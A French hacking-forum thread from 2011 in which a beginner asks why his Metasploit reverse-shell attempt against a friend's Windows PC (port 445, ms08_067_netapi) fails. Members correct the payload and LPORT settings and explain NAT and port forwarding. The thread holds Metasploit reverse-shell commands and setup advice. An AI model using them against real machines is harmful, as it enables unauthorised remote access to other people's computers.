Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-12-2011 00:29:31

xien
N00b
Inscription : 30-12-2011
Messages : 2

metasploit

bonsoir  et merci pour votre effort c'est un site merveilleux
j'ai une ip dynamique de type 10.xxxxxxx.xxx je voudrais utiliser metasploit pour faire une pentest  un pc mon ami qui ma demander il a le port 445 ouvert


set PAYLOAD generic/shell_reverse_tcp
set LHOST 10.xxx.xxx.xxx
set RHOST xxx.xxx.xxx.xxx
exploit
impossible d'etablir la connexion
est ce que on peut avoir un shell avec se type adresse ip ou il faut une ip public pour avoir la liaison
mon FAI M'ATTRIBUE AUTOMATIQUEMENT ADRESSE IP DYNAMIQUE DE TYPE 10.XXX.XXX.XXX.XXX
comment faire et merci beaucoup

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-12-2011 00:39:31

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : metasploit

Il y a plusieurs problèmes dans ta commande :
- tu devrais déjà utiliser un payload plus spécifique que le "generic/reverse_shell_tcp" : par exemple si ta cible est sous Windows, tu utilises windows/shell_reverse_tcp
- tu ne précises pas de port de connexion, ça ne peut pas marcher. Pour ce payload, les 2 seuls paramètres sont LHOST (ton adresse) et LPORT (le port sur lequel tu écoutes). pas de RHOST ici (en cas de doute tu peux taper "show options")
- tu ne précises aucun exploit, et c'est lui qui "déclenche" la connexion en reverse vers ta machine. Ou bien tu compiles un payload avec msfpaylaod et tu demandes à ton ami de l'exécuter manuellement, ou bien tu dois trouver un exploit sur sa machine (bon courage).

Il faut également que tu vérifies sur ton routeur/pare-feu si le port LHOST est bien transféré vers ta machine d'attaque, sinon ça ne peut pas fonctionner wink
Ah, et ton IP publique ne peut pas être de la forme 10.*.*.*, cette plage est réservée pour les LAN. D'après ce que je vois, ton opérateur t'attribue une adresse du type 41.*.*.*

Ne le prends pas mal, mais j'ai peur que tu te lances dans un truc un peu trop compliqué par rapport à tes connaissances actuelles...

Hors Ligne

#3 30-12-2011 01:52:11

xien
N00b
Inscription : 30-12-2011
Messages : 2

Re : metasploit

merci beaucoup pour votre aide
j'utilise pour internet modem sans fil lg quand je tape ifconfig local ip = 10.xxx.xxx.xxx et quand j'aille sur www.whatismyip.com j'ai 41.xxx.xxx.xxx
je m'excuse  pour payload je met windows/shell_reverse_tcp j'ai fait une erreure
pour pc mon ami il a exploit smb j'utilise exploit netapi de metasploit
impossible d'avoir un shell et merci

Hors Ligne

#4 30-12-2011 05:18:53

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : metasploit

j'utilise exploit netapi de metasploit

Je pense Antares qu’il veut utiliser cet exploit ("smb/ms08_67_netapi") un peu vieux dont les tutos abondent sur le net et en particulier sur youtube. Alors quelques précisions:

- Cet exploit basé sur la vulnérabilité liée au protocole SMB via le port 445 est corrigé de nos jours, mais tu peux toujours essayer.

- Ca ne concerne que Windows XP, donc ton ami devait avoir cet OS.

- Il faut que tu initialises la connexion pour atteindre le PC de ton ami sur un autre réseau (lan) via internet, comme le précise Antares, le pare-feu t'empêcherais de traverser. Alors que lors d'un pentest comme tu dis, tu ne devrais pas dire à la cible fais ceci et fais cela pour que j'arrive à m'introduire, et donc ton ami est bien protégé tongue

- Ca fonctionnait du temps ou les anti-virus n’étaient pas vraiment "habitué" aux payloads de metasploit, déjà là c'est mort.

Une seul solution, c'est comme l'indique habillement Antares, il faudrait que ton ami exécute lui même le payload en prenant soin d'ouvrir un port d’écoute sur son pare-feu qui correspond à celui que ta configurer pour attendre la connexion.

Tu peux demander à ton ami de jetter un oeil à ce tuto afin de désactiver les ports vulnérables, enfin si tu veux wink
--> Fermer les ports critiques

Dernière modification par Fuji (30-12-2011 06:32:42)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.021 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]